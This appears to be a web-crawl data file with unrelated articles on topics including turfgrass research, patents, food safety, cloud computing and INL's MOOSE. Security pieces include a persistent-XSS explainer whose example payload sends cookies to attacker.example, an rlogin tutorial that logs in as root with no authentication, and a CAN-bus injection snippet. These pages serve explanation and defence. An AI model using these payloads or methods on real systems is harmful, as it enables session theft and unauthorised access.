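    print(f"{it['name']}: drift {drift:+.0%} -> {status}")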
Either process can be successful if these assumptions are met. However, in practice most organizations do not have the luxury of controlling change, as reality has a way of changing the rules, the game, the goal posts and even the playing field. Most important, modern management techniques, such as Bayesian decision planning, place the emphasis on agile business models that are proactive in changing markets and responding to customers' needs before they need them. Leveraging the newest and most powerful technologies quickly and effectively can make or break an organization. Unless the selected process embraces agility and is designed to handle and manage the dynamic stability of the process, agile organizations are doomed to failure. This is the lesson of the auto industry: process must support the corporate strategy and vision. Cost-effective agility that leverages the correct technologies to not only meet but anticipate and consistently exceed the expectations of customers is essential. It is the duty of management to ensure that the selected process supports rather than sabotages these goals. Carmine Magione is chief architect/technologist for Bridge Medical, a developer of patient safety software for the medical industry.
Nangle E.J., Chicago District Golf Association | Gardner D.S., Dep. of Horticulture and Crop Science | Metzger J.D., Dep. of Horticulture and Crop Science | Rodriguez-Saona L., Dep. of Food Science and Technology | And 3 more authors. Agronomy Journal | Year: 2015
Pigments and phenolics that absorb ultraviolet light (UV) are involved in the protection of the photosynthetic apparatus during periods of high ultraviolet-B (UV-B) radiation and can be of benefit to turfgrasses. This study initiated in October 2010 and repeated in March 2011 aimed to characterize protective pigment responses to elevated UV-B in cool-season turfgrass. Tall fescue (Festuca arundinacea Schreb.), perennial ryegrass (Lolium perenne L.), and creeping bentgrass (Agrostis stolonifera L.) cultivars L93 and Penncross were tested. Turfgrass pigment responses were measured over a 1-wk period during which they were subjected to 16 kJ m⁻² d⁻¹ of UV-B in growth chambers. Photoperiod was 14 h and plants were subjected to 26.2 mol m⁻² d⁻¹ photosynthetically active radiation (PAR) at 20°C day and 17°C night. Turfgrass samples were collected at Day 0, 1, 3, 5, and 7. Measurements included chlorophyll fluorescence, chlorophyll pigmentation, and flavonoid, phenolic, anthocyanin, and carotenoid concentrations. Chlorophyll fluorescence increased and chlorophyll quantities decreased significantly (P < 0.05) in UV-B conditions compared to control. All species had significantly (P < 0.05) higher quantities of total phenolics and flavonoids at the top of the tissue canopy relative to roots and shoot tissue near the soil surface. Anthocyanins were only found in creeping bentgrass L93. Carotenoids, zeaxanthin, and β-carotene declined in the UV-B treatment for both creeping bentgrass L93 and Penncross after 7 d, but did not decrease for perennial ryegrass or tall fescue. Carotenoids may play a greater role in UV-B tolerance than anthocyanins in cool-season turfgrasses due to their ubiquitous presence. © 2015 by the American Society of Agronomy, 5585 Guilford Road, Madison, WI 53711. All rights reserved.
Patents are still very much in the news. I discussed a broad review of patents in my last column. This month, I will drill down a bit. I hope you went to Google Patents and downloaded one or more just to see what they look like. Only utility patents will be discussed here. Design patents are not usually obtained by engineers. A utility patent document usually has several distinct parts, some of which are legal requirements. The first page of the patent has a title section across the top with the first named inventor, patent number and date of issue. Next is the title of the patent, and then a complete listing of the named inventors and their residences, followed by an application number and the date of filing. The field of search is a listing of numerical categories the patent office uses to sort out different fields of invention. It’s just an indexing system where similar inventions might be found. A list of references provides sources of similar patents and publications that can be used to fill in the background and demonstrate what has previously been done. The patent office examiner and the representative of the inventors are identified. A brief abstract summarizes the invention. And a representative drawing appears on the first sheet. Next are the drawings made according to patent office rules. Two general types of drawings are functional block diagrams and flow charts. The elements of the drawings are numbered, and the text refers to the numbers when describing the drawings. The text of the patent is called the specification. It begins with a section called the background of the invention. This describes the general area of the invention and the problems in the prior art. These are the problems the new invention seeks to ameliorate or solve. A good invention will solve a “long-felt need” and will succeed where others have failed. The background section will broadly describe what “one of ordinary skill in the art” would be expected to know. This is important because you can’t describe everything that goes into the invention. You have to make some assumptions about what the reader will know and what sort of background knowledge he or she will have. Carl Sagan famously said: “If you wish to make an apple pie from scratch, you must first invent the universe.” This can’t apply here. The summary of the invention is just that. It’s a brief description of what has been invented and how it solves the problems with the prior art described in the background section. It often has several paragraphs that begin with: “It is an object of the invention to provide an apparatus and method to. …” The brief description of the drawings follows with just one sentence per drawing. There is very little detail in this listing. Next are two sections that do the heavy lifting: the detailed description of the preferred embodiments and the claims. You will recall from the discussion in the last column that a patent can be considered a deal between the inventor and society, wherein the inventor makes a complete disclosure of the invention and how to practice it in exchange for a limited period of exclusivity, during which the inventor has the right to preclude others from making, selling or using the invention. The inventor is not required to describe every possible way of practicing the invention, just at least one preferred way, called a preferred embodiment. More than one embodiment is better, but not all need be disclosed.
The figures play an important role in this section. As mentioned earlier, each element of a drawing is numbered. Those numbers are called out in the specification, and the associated elements are described in detail, along with any interaction there might be with other elements. The preferred embodiment section usually ends with a statement that other variations and modifications that would occur to one of ordinary skill in the art are included as part of the invention. The claims are the heart of the patent. They define the scope of the invention. If a feature or function is not covered by a claim, it is not part of the invention, even if it is described in detail in the specification. The creation of claims is highly technical and should only be done by an experienced patent attorney or patent agent. Reading the claims of a patent will convince you of this. There are a number of fun patents. Patent number 6,733,362 covers a bra. Another example is 5,443,036, “A method of exercising a cat.” It’s a very short patent, only four pages, having only four claims and one drawing sheet. I have personally infringed that patent, since I used it. However, we are unlikely to ever know if it is a valid patent because no one will challenge it in court. That’s an expensive exercise, and there is no financial motivation to do that. There is even a website for absurd patents. Visit it and get a laugh or two.
In recent years, the United States has seen an increasing incidence of food contamination. These incidents reflect a troubling trend that has seen the average number of outbreaks from contaminated produce and other foods grow to nearly 350 a year from 100 a year in the early 1990s, President Obama said Saturday in his weekly YouTube address. Obama cited several reasons for this in his address, including outdated regulations, fewer inspectors, scaled-back inspections of the nation's food supply and a lack of information sharing between the government agencies charged with that responsibility. "The FDA has been underfunded and understaffed in recent years, leaving the agency with resources to inspect just 7,000 of our 150,000 food processing plants and warehouses each year," Obama said. That leaves 95 percent of America's food supply uninspected. "That is a hazard to public health," he said. That will change under the new leadership of the U.S. Food and Drug Administration, he said. In the address, he announced the appointment of Dr. Margaret Hamburg as Commissioner of the Food and Drug Administration and Joshua Sharfstein as deputy commissioner. Obama also announced the creation of a new Food Safety Working Group to address the steep rise in the incidence of contaminated food. The working group will bring together Cabinet secretaries and senior officials to advise the president on how best to upgrade food safety laws, foster coordination throughout the government and improve the enforcement of food safety laws. Obama directed the working group to report its recommendations to him "as soon as possible." The U.S. Department of Agriculture is also changing a rule that allowed the sale of "downer cattle" into the food supply on a case-by-case basis. The new rule requires that cattle which become non-ambulatory after passing ante-mortem inspection be condemned and properly disposed of. Obama also announced a plan for a billion-dollar investment in modernizing food safety labs, which will include "significantly increasing the number of food inspectors helping ensure that the FDA has the staff and support they need to protect the food we eat," he said. "In the end, food safety is something I take seriously, not just as your president but as a parent," Obama said. "No parent should have to worry that their child is going to get sick from their lunch, just as no family should have to worry that the medicines they buy will cause them harm."
Google this week piloted a new feature that, according to the company, "makes it easy to find and compare public data," but, in reality, Google itself can't find a lot of the public data out there. Many federal Web sites or content on site pages cannot be indexed by typical search engines, including Google. So, much of the data on these sites is invisible, or hidden in the so-called "Deep Web." Part of the reason is that government pages include databases, forms and other coding that search engines cannot crawl through. Many are also lacking site maps, or a structured breakdown of the pages of a Web site, that help search engines capture all of a site's pages. Google's new tool, Google Public Data, only works with public data that is already accessible to search engines. The company created the application because federal data "was complicated not because it was inaccessible," Google spokeswoman Aviva Gilbert said. It takes easy-to-crawl -- but otherwise opaque -- information and makes it easy to understand. Google grabs unemployment rates and population data accessible through the sites of the U.S. Bureau of Labor Statistics and the U.S. Census Bureau's Population Division and displays the information in interactive graphs that the user can manipulate. "When comparing Santa Clara county data to the national unemployment rate, it becomes clear not only that Santa Clara's peak during 2002-2003 was really dramatic, but also that the recent increase is a bit more drastic than the national rate," states a Google release, explaining what can be concluded based on the visualization. A standard Google search for unemployment data in Santa Clara county would lead the user to a list of various public and private links -- "but it was difficult to navigate," Gilbert said. The new tool does not make online federal data more accessible, but rather more meaningful. Google researchers "haven't figured out how to site map everything," said Jerry Brito, who studies government transparency as a senior research fellow at George Mason University's Mercatus Center. "It's kind of impossible to do that without the government agencies' cooperation." He and Google have advocated that Congress require agencies to make all of the information on their sites accessible to commercial search engines. A law introduced last Congress by Sen. Joseph I. Lieberman, I-Conn., chairman of the Homeland Security and Governmental Affairs Committee, directs the government to "promulgate guidance and best practices to ensure that publicly available online federal government information and services are made more accessible to external search capabilities, including commercial and governmental search capabilities."
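The "site map" referred to here is typically a sitemap.xml file listing every page a crawler should index. A minimal sketch of generating one follows; the agency URLs are placeholders, not real government pages.

# Sketch: emit a minimal sitemap.xml so crawlers can discover otherwise hidden pages.
# The URLs below are placeholders for illustration only.
from xml.etree.ElementTree import Element, SubElement, ElementTree

pages = [
    "https://agency.example.gov/data/unemployment",
    "https://agency.example.gov/data/population",
]

urlset = Element("urlset", xmlns="http://www.sitemaps.org/schemas/sitemap/0.9")
for page in pages:
    url = SubElement(urlset, "url")
    SubElement(url, "loc").text = page
    SubElement(url, "changefreq").text = "monthly"

ElementTree(urlset).write("sitemap.xml", encoding="utf-8", xml_declaration=True)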
<urn:uuid:81333c92-c962-4e8d-bd18-ea1a0af6789a>
CC-MAIN-2017-04
http://www.nextgov.com/technology-news/tech-insider/2009/04/for-google-public-not-always-public/52433/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938291
520
2.578125
3
Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim's trust in a legitimate, but vulnerable, website or web application. XSS vulnerabilities are the most common type of input validation vulnerabilities, according to the Context Information Security report "Web application vulnerability statistics 2013". The Persistent XSS condition is met when a website or web application stores user input and serves it back to other users at a later stage, without validating it before storage or before embedding the stored content into HTML response pages. Hence, malicious code is injected by attackers into vulnerable web pages and is then stored on the web server for later use. The payload may be served back to other users browsing those pages and executed in their context at a later stage. Thus, the victims do not need to click on a malicious link in order to run the payload (as in the case of Non-Persistent XSS); they simply have to visit the vulnerable web page, which serves back un-sanitized user input from other web sessions. Persistent XSS is less frequent than Non-Persistent XSS, as the vulnerabilities which make it possible are less common and more difficult to find. On the other hand, the damage that Persistent XSS can do is more devastating than the damage done by Non-Persistent XSS – because once the payload is stored, it has the potential of infecting most of the visitors of the vulnerable web page. Persistent XSS is also referred to as Type 2 XSS because the attack is carried out via two requests: one for injecting the malicious code and having it stored on the web server, and one for when victims load the HTML pages containing the payload.
Description of Persistent / Stored Cross-site Scripting
As with most web-based attacks, exploiting Stored XSS vulnerabilities requires some research. Usually attackers search for vulnerable websites that can be used to carry out an attack. Some types of websites are prone to such vulnerabilities because they allow content sharing between users, and consequently they constitute the starting points of research in this respect:
- Forums / message boards
- Blogging websites
- Social networks
- Web-based collaboration tools
- Web-based CRM/ERP systems
- Web-based email server consoles and web-based email clients
Once a website is identified as being potentially vulnerable, attackers will try to inject script code into data that is going to be stored on the server. Then, they will access the web pages that serve back the content they have posted and test whether the script executes. The malicious code itself is usually delivered manually by the attacker in input fields on the vulnerable web pages, but there are cases where attackers build tools that regularly inject scripts automatically. Unlike Non-Persistent XSS, Persistent XSS does not require a social engineering phase, as victims of this attack do not need to be lured into clicking on a crafted link. However, when exploiting Persistent XSS vulnerabilities, attackers will try to get more and more victims to visit the vulnerable web page, so they will most probably still send spam messages or promote it on social networking websites.
Examples of Stored XSS
Forums / message boards
Once a forum is identified as vulnerable, attackers may open a new topic and insert malicious scripts in the topic title or body.
They can also tag the topic using popular keywords so that it shows up prominently in search results. The content of the forum post will be stored by the server. When victims browse topics or search for certain keywords, they may reach the infected topic. When the topic loads, its contents will be sent to the victim's browser and the payload may be executed. Alternatively, attackers may build tools that automatically post malicious scripts in replies on popular / sticky topics, send private messages containing the payload to forum members, etc. The consequences can be far-reaching, because the injected script executes in every victim's browser within the security context of the vulnerable site; the impact is amplified when victims are logged in with privileged accounts, and many home users still browse from default administrator accounts with protections such as user access control and hardened browser policies disabled in order to improve the user experience.
Typical goals of Persistent XSS attacks:
- Cookie theft
- Data theft
Defending Against Persistent / Stored XSS
The best way to prevent Persistent XSS is to make sure that all user input is properly sanitized before it gets stored permanently on the web server, and, as a second line of defense, to make sure that the stored content presented to users is also sanitized. As malicious scripts can be encoded in various ways, sanitization parsers should take encoding into consideration, as well as the various ways to inject code, when searching for payloads in the content to be stored or served back. Web applications can be kept XSS-free by conducting assessment tests on a regular basis using a web vulnerability scanner that detects cross-site scripting vulnerabilities while providing you with details on how to fix them.
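To make the output-sanitization advice concrete, here is a minimal sketch in Python (my illustration, not part of the original article); it assumes that escaping at render time is acceptable for the application, and the payload string and attacker.example URL are purely hypothetical:

    import html

    # Hypothetical user-submitted forum comment carrying a stored XSS payload.
    submitted_comment = "<script>document.location='http://attacker.example/c?'+document.cookie</script>"

    def render_comment(comment: str) -> str:
        # Escaping on output turns the characters that are special in HTML
        # (<, >, &, quotes) into entities, so the browser displays the payload
        # as harmless text instead of executing it.
        return "<p>" + html.escape(comment, quote=True) + "</p>"

    print(render_comment(submitted_comment))

In a real application this would be complemented by validation before storage and by context-aware encoding (HTML body, attribute, JavaScript, URL), since a single escaping routine does not cover every output context.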
<urn:uuid:b0e9c5cc-af5b-4903-a1be-d85840e15456>
CC-MAIN-2017-04
http://www.acunetix.com/blog/articles/persistent-cross-site-scripting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00081-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914511
1,063
3.015625
3
Two security researchers at Defcon on Friday revealed the methods they used to hack into car computers and take over the steering, acceleration, brakes and other important functions. Charlie Miller, a security engineer at Twitter, and Chris Valasek, director of security intelligence at IOActive, spent 10 months researching how they could hack into the network of embedded computer systems called electronic control units (ECUs) used in modern cars and see what they could do once they gained access to it. Their test cars were a 2010 Ford Escape and a 2010 Toyota Prius. Some of the things they were able to achieve by hooking a laptop to the ECU communications network and injecting rogue signals into it included disabling the brakes while the car was in motion, jerking the steering wheel, accelerating, killing the engine, yanking the seat belt, displaying bogus speedometer and fuel gauge readings, turning on and off the car's lights, and blasting the horn. The researchers also found a way to achieve persistent attacks by modifying the ECU firmware to send rogue signals even when they were no longer physically connected to the control units. A research paper explaining how the hacking was done was shared with Ford and Toyota a few weeks before the Defcon presentation, the researchers said. Toyota responded that it didn't consider this to be car hacking and that the company's security efforts are focused on preventing remote attacks from outside the car, not those that involve physically accessing the control system, Miller and Valasek said. The goal of the research was to see what could be done when hackers gain access to the ECU network, known as the controller area network bus, the researchers said. It doesn't matter if it's done locally or remotely; access to a single ECU provides access to the whole network and gives the ability to inject commands, they said. Miller is certain that other researchers will find ways to remotely attack the systems in the future. The software industry hasn't figured out how to write secure software yet, so there's no reason to believe car makers have figured it out either, he said. The code in systems that can be accessed remotely -- telematics units, tire sensors, those using Bluetooth and Wi-Fi -- might have a lot of vulnerabilities, he said. "I'm sure that if people start looking, they will start finding vulnerabilities." That's part of the reason Miller and Valasek decided to make the details of their research public, including what kind of equipment, cables and software they used. The full research paper and the custom software tools that were written to interact with the ECUs, as well as the code used to inject particular commands, will be released this weekend, Miller said. "We want other researchers to keep working on this; on other cars or on the same cars," Miller said. "It took us ten months to do this project, but if we had the tools that we have now, we would have done it in two months. We want to make it easy for everyone else to get involved in this kind of research." Concerns that the tools could enable people to hack car systems for malicious purposes are valid, the researcher said. However, if it's that easy to do, then they could do it anyway; it would just take them a bit more time, he said. "If the only thing that keeps our cars safe is that no one bothers to do this kind of research, then they're not really secure," Miller said. "I think it's better to lay it all out, find the problems and start talking about them."
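The researchers' own injection tools are not reproduced here, but the general shape of writing frames onto a CAN bus can be sketched with the open-source python-can library. This is my illustration only; the interface name, arbitration ID and data bytes are placeholders, not the values used against the Ford or Toyota ECUs:

    import can  # python-can; assumes a SocketCAN interface on Linux

    # Hypothetical sketch: open the bus and transmit a single frame. Real ECU
    # networks expect vehicle-specific arbitration IDs and payload formats.
    bus = can.interface.Bus(channel="can0", bustype="socketcan")
    frame = can.Message(arbitration_id=0x123,           # placeholder ID
                        data=[0x01, 0x02, 0x03, 0x04],  # placeholder payload
                        is_extended_id=False)
    bus.send(frame)
    # Classic CAN carries no sender authentication, so any node on the bus
    # treats this frame the same as one sent by a legitimate ECU.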
However, fixing the issues won't be easy because most of them are there by design, according to Miller. Car manufacturers won't be able to just issue a patch, the researcher said. "They'll have to change the way these systems are made." Right now, there's no authentication when car computers communicate with each other, because they need to react and send signals quickly in potentially dangerous situations, the researcher said. Adding authentication will introduce latency, so the systems will need faster processors to make up for that. Those processors would cost more, so car prices would rise, he said. "We had not seen the research in advance, but learned about it through media coverage," Cindy Knight, public affairs manager at Toyota Motor Sales, said on Saturday via email. "At Toyota, we take seriously any form of tampering with our electronic control systems," she said. "We strive to ensure that our electronic control systems are robust and secure and we will continue to rigorously test and improve them." "It is important to note that this recently publicized demonstration required a physical presence inside the vehicle, extensive disassembly of the instrument panel, and a hard-wired connection," Knight said. "All of this would be very obvious to the driver." Ford Motor Co. in the U.S. did not immediately respond to a request for comments.
<urn:uuid:7775c4ae-39f4-4c54-9d41-0b7549ff5236>
CC-MAIN-2017-04
http://www.networkworld.com/article/2168750/access-control/researchers-reveal-methods-behind-car-hack-at-defcon.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00081-ip-10-171-10-70.ec2.internal.warc.gz
en
0.975666
1,008
2.59375
3
By Alex Lesser, Vice President, Cloud/Data Infrastructure Group at PSSC Labs
What is a cloud? Obviously it is a group of small water particles we see in the Earth's atmosphere. But when combined with the word "computing," a cloud takes on a life of its own. The best definition of cloud that I have heard is that it is simply "the easy button". I'm certain many meeting questions are answered with a simple, "We'll just use the cloud." While this may be a naïve notion, I can't agree more. And in today's complex world who can blame us for wanting to find the simple answer to everything? But is the answer really that simple? Let's set the way-back time machine to the late 80's and early 90's, when a revolutionary technology offered us the ability to find the answer to everything. This technology was famously coined "the Internet." Suddenly we had the ability to instantaneously access information from anywhere in the world. The name was exotic at first, but in computer time it is an antiquated phrase at just 20 years old. We are a next generation society. We have next generation cell phones, next generation advertising, next generation genome sequencing and, of course, next generation Internet. To a great degree cloud computing is simply the evolution of the Internet. Fortunately the answer to cloud computing does not end there. I believe a deeper understanding can help to explain how we are developing tools to store, manipulate and track ever-increasing amounts of data. At its core, cloud computing is a remote computing environment which includes processors, storage, memory, an operating system, applications and a network connection that allows people to access those resources. My organization PSSC Labs has been delivering cloud computing systems for over a decade, well before the term cloud computing came about. We refer to our systems as "Computer Clusters". We delivered our 1000th PowerWulf Computer Cluster in 2009. Many people may not immediately recognize our systems as cloud computers. They are not massive systems filling an entire 25,000 square foot warehouse. Most of the organizations using these systems are not publicly traded. Our Computer Clusters are designed and custom-configured to meet the needs of specific computing goals.
Public & Private Clouds
As the term continues to evolve, cloud computers will be further delineated as either "Public" or "Private". Public clouds are just that–public. This means that any organization has the ability to access the available computing resource. Many companies, large and small, are creating and marketing public clouds. One important note: just because a cloud is public does not necessarily mean that it is free to use. In fact, most public clouds require users to pay subscription fees. My organization uses one of the more commonly recognized Public Cloud Computing companies, Salesforce.com. Salesforce.com offers us the computing resources to manage, monitor and update our growing sales team. We pay a monthly fee to access Salesforce.com, upload information, and track data. Salesforce.com is outside of our organization and therefore is part of the Public network. However, the information that I upload to Salesforce.com is private, and hopefully remains private. Private clouds, on the other hand, reside within an organization's firewall and are not accessible by anyone who has not been granted access. This is the far more common Cloud Computer. Many companies have invested heavily in their in-house computing resources.
These computing resources are accessible only by individuals within the company. The private clouds greatly outnumber public clouds. Most organizations consider sensitive data critical to their business. Letting any intellectual property outside the company firewall is a risk most companies have not taken. A line is being drawn in the sand–will public clouds eventually replace private clouds? For me, this argument is non-essential. Instead, we should focus on the fact that computing resource needs are growing, and fast. In less than 10 years we have seen the birth of several massive computing facilities, each of which would fill a football stadium. Data is being generated at petabytes per second. We need to find a smarter, more efficient way of creating sustainable, high performance cloud computing infrastructures. We are working to deliver compute and storage solutions for any size public and private clouds.
<urn:uuid:3ff7f131-2a57-480f-8f1c-059c258c60e1>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/04/05/cloud_surfing_made_simple/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00569-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949679
902
2.640625
3
One of the services that you can discover in Unix environments is rlogin. This service runs on port 513 and allows users to log in to the host remotely. It was mostly used in the old days for remote administration, but because of security issues it has since been replaced by slogin and ssh. However, if you find a system that is not properly configured and is still using this service, then you should try to exploit it. Let's say that you discover the following system, on which rlogin is running on port 513. The next step is to check whether the rsh-client is installed on our system. If not, then we have to run the command apt-get install rsh-client. The rsh-client is a remote login utility that allows users to connect to remote machines. The last step is to use the command rlogin -l root IP. This command will try to log in to the remote host using the login name root. As we can see from the next image, we have successfully logged in remotely as the root user without being asked for any authentication. Of course, if we know that there are other usernames on the remote host, we can try them as well. The reason that we were able to connect remotely without any authentication is that rlogin as a service is insecure by design and can potentially allow anyone to log in without providing a password. It is very difficult nowadays to find a system with this service running, but it is worth the try if you discover it.
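As a complement to the walkthrough above, here is a minimal sketch (my addition, not from the original post) that checks whether TCP port 513 is reachable on a target before reaching for the rlogin client; the target address is a placeholder:

    import socket

    TARGET = "192.168.1.10"  # placeholder address for the host being assessed

    def rlogin_port_open(host: str, port: int = 513, timeout: float = 3.0) -> bool:
        # A plain TCP connect only tells us that something is listening on 513;
        # whether it actually grants unauthenticated root access still has to
        # be verified with the rlogin client, as described above.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return s.connect_ex((host, port)) == 0

    print("rlogin port open:", rlogin_port_open(TARGET))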
<urn:uuid:cf8aec39-7a76-4b17-b74b-792d045b745f>
CC-MAIN-2017-04
https://pentestlab.blog/2012/07/20/rlogin-service-exploitation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960064
320
2.890625
3
Idaho National Laboratory (INL) continues its development of an advanced software framework for simulating the behavior of complex systems, called MOOSE. Work on MOOSE, which stands for Multiphysics Object-Oriented Simulation Environment, began in 2008. The development team started with computer code and numerical libraries from existing, proven "massively scaling numerical tools" and kept enhancing this new framework, which now boasts high-level features, including a "hybrid parallel mode" and "mesh adaptivity."
[Photo caption: Jason Miller, part of the team that developed MOOSE, runs the MARMOT code, which models microscopic changes in nuclear fuel during irradiation.]
The MOOSE development team is working to make simulation more accessible by making it easier to create simulation capabilities for complex mathematical models in fields like nuclear science, physics and chemistry. MOOSE opens up the advantages of simulation to all these domain experts – so they can advance their science without also having to become computer scientists. "People were doing these simulations before, but they had to develop the entire code," said Derek Gaston, the computational mathematician leading INL's Computational Frameworks Group. "Something that would take 5 years with a team of 10 people can now be done in 1 year with three people." MOOSE's biggest success has been in the field of nuclear energy research. For nuclear engineers studying irradiation's complex effect on materials and reactor components, mathematical models and computer simulations are enormously helpful. Irradiation experiments are expensive and time-consuming, requiring multiple steps that can add up to years before a result is achieved. Modeling and simulation help steer the research in the right direction and allow the scientists to design a better, i.e., more focused, experiment. Although the computational assist is advantageous, it is not without challenges. As this article from Idaho National Laboratory explains: "Building simulations is a time-consuming task requiring an entire team of people with detailed understanding of everything from parallel code development to the physics of the system under study. Most scientists are not programmers (and vice versa), so tackling simulation often proved too daunting." This is where MOOSE comes in. According to the INL piece, "MOOSE carries much of the programming burden, making simulation tools more accessible for a wide array of researchers." MOOSE was designed to be a general problem solver, capable of accommodating multiple mathematical models. Its plug-and-play design lets researchers enter the information that describes their system and MOOSE does the rest. That's the beauty of MOOSE, according to Steve Hayes, an INL nuclear engineer who leads irradiation testing and post-irradiation examination (PIE) for the U.S. Department of Energy's Fuel Cycle R&D program. "The user needs to know the governing equations for his or her field, and MOOSE solves them for you, meaning the scientist can focus on the science," says Hayes. In keeping with the theme of increased accessibility, MOOSE runs on personal workstations, so researchers can carry out powerful simulations without a supercomputer.
“MOOSE has revolutionized predictive modeling,” according to an article at INL, “especially in the field of nuclear engineering – allowing nuclear fuels and materials scientists to develop numerous applications that predict the behavior of fuels and materials under operating and accident conditions.” The simplicity of MOOSE has led to an entire ecosystem of tools, including applications for nuclear physics (BISON, MARMOT), geology (FALCON), chemistry (RAT) and engineering (RAVEN, Pronghorn).
<urn:uuid:5e89b065-34c8-4516-ac14-bab35aa00c89>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/09/11/moose_enables_plug_and_play_simulations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940948
768
2.90625
3
Nasa and Cisco are partnering to develop a climate change monitoring platform. The online collaborative global monitoring platform, called the "Planetary Skin", will capture, collect, analyse and report data on environmental conditions around the world. Under the terms of a Space Act Agreement, Nasa and Cisco will work together to develop the Planetary Skin as an online collaborative platform, to capture and analyse data from satellite, airborne, sea- and land-based sensors. This data will be made available for the general public, governments and businesses to measure, report and verify environmental data in near-real-time, to help detect and adapt to global climate change. "In the past 50 years, Nasa's expertise has been applied to solving humanity's challenges, including playing a part in discovering global climate change," said S Pete Worden, director of Nasa's Ames Research Center. "The Nasa-Cisco partnership brings together two world-class organisations that are well equipped with the technologies and skills to develop and prototype the Planetary Skin infrastructure." Cisco and Nasa will kick off Planetary Skin with a series of pilot projects, including "Rainforest Skin," which will be prototyped during the next year. Rainforest Skin will focus on the deforestation of rainforests around the world and explore how to integrate a comprehensive sensor network. It will also examine how to capture, analyse and present information about the changes in the amount of carbon in rainforests in a transparent and useable way. According to scientists, the destruction of rainforests causes more carbon to be added to the atmosphere and remain there. That contributes significantly to global warming. "Mitigating the impacts of climate change is critical to the world's economic and social stability," said John Chambers, Cisco chief executive. "This unique partnership taps the power and innovation of the market and harnesses it for the public good. "Cisco is proud to work with Nasa on this initiative and hopes others from the public, private and not-for-profit sectors will join us in this exciting endeavour."
<urn:uuid:ec5104a4-109f-4ef2-a866-ddf9d0334930>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240088646/Nasa-and-Cisco-build-climate-change-reporting-platform
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00293-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944681
440
2.96875
3
Originally published November 15, 2011 When Confucius was asked what he would do first if he were in power, he responded: “Cleanse the definitions of terms we use!” According to Confucius, nothing is so destructive for peace, justice and prosperity as confusing names and definitions. To illustrate the question of what is real and what is not, Plato tells a story about a cave. In the middle of a cave, a number of prisoners sit against a small wall, chained there since childhood. They face one of the walls of the cave. Behind them there is a huge campfire that they cannot see. People walk between the campfire and the prisoners. All the prisoners can see is the shadows of these people on the cave’s wall in front of them. And because of the echo within the cave, even the sounds the people make seem to come from the direction of the shadows. To the prisoners, these shadows are the real world. Now let’s assume, Plato continues, that one prisoner is released from his chains, gets up and walks around. At first, he will not recognize anything in this new reality, but after time he would adapt. He would understand more about the new world, and perhaps even understand how people walking alongside a campfire cast shadows on the wall. What would happen if he returned to the other prisoners and told them what he has learned? They would ignore him, ridicule him, and if not for their chains, probably kill him. What Plato is trying to tell us is that a philosopher is like a prisoner freed from the cave, trying to understand reality. On a deeper level, Plato explains that the words we have for things refer to concepts in our mind; in other words, the shadows. We perceive reality through these concepts. Plato’s Cave is an old story, but still told in many variations. For instance, Plato’s Cave provides the philosophical basis for the film The Matrix, in which Morpheus explains to Neo: “How do you define real? If you're talking about what you can feel, what you can smell, what you can taste and see, then real is simply electrical signals interpreted by your brain.” Plato’s Cave showed that what was reality to the prisoners was nothing but a shadow, covering the “true reality.” For centuries, philosophers have tried to break free of their chains and find the truth. The Enlightenment philosophers believed the world was a large “machine”, and it was man’s purpose to uncover the laws of nature through reason and understand how the world turns. Immanuel Kant spoke of the Categorical Imperative in his search of universal principles to decide what’s right and wrong. Throughout the Middle Ages, truth was a religious principle. Plato believed that everything we saw was just a reflection of an underlying concept, which Kant later called the thing as such (Ding an sich). Every tree is an example of the concept of treeness, every person an example of humanity, every chair an example of chairness. But the postmodernists try to break away from the idea of truth. In their view, there can only be perception. Everything we perceive comes to us through our senses. What we see, what we feel, what we hear, and so forth. Perceptions can be communicated and shared, but this only means that reality is a social construct and can change anytime. Because perceptions are shared through language, truth and reality are culturally dependent. 
Think of the legend that Eskimos have nine different words for snow, or that doctors, accountants, lawyers and IT specialists have rich jargons to describe their truths and realities in much more detailed terms than those in other professions. Philosophers that shaped postmodernism include Søren Kierkegaard, Friedrich Nietzsche and Martin Heidegger. Although postmodernism has its critics as well, it is the dominant way of thinking today. If we look through the postmodern lens, what more would Plato’s cave reveal? Let’s expand Plato’s thought experiment. To my knowledge, Plato never said the prisoners were not able or not allowed to talk. Let them talk, and have them describe what they see. The prisoners sitting on the ends of the row may describe the shadows close to them as very long, while the prisoners in the middle would characterize them as short. The cave is warm to those sitting close to the fire, but cold to those sitting farther away from it. Each would tell a different story. And, just for the sake of argument, let’s bring in time travel and introduce a video camera into ancient Greece. We’ll allow all prisoners to record their view of reality and share those recordings. Whose recording is true? They are all true.1 If they are smart enough, they will detect a pattern if they each describe their reality from left to right. In fact, let’s take the experiment one step further, and allow the prisoners to turn around. They can see the fire and all the people moving through the cave, but are still chained to the wall. They would still each describe a slightly different view on reality. In short, postmodernists wouldn’t describe truth in terms of the shadow on the wall, and their underlying reality, they would describe it in relative terms; i.e., relative toward other perceivers regardless of whether they are looking at the shadows or the real people. In other words, truth is not in the objects we examine, not in the things as such, but in the eye of the beholder. Although we live in the postmodern world, IT professionals (and many other business professionals as well) are firmly entrenched in classic times. In the tradition of Plato and Kant, there must be a universal underlying 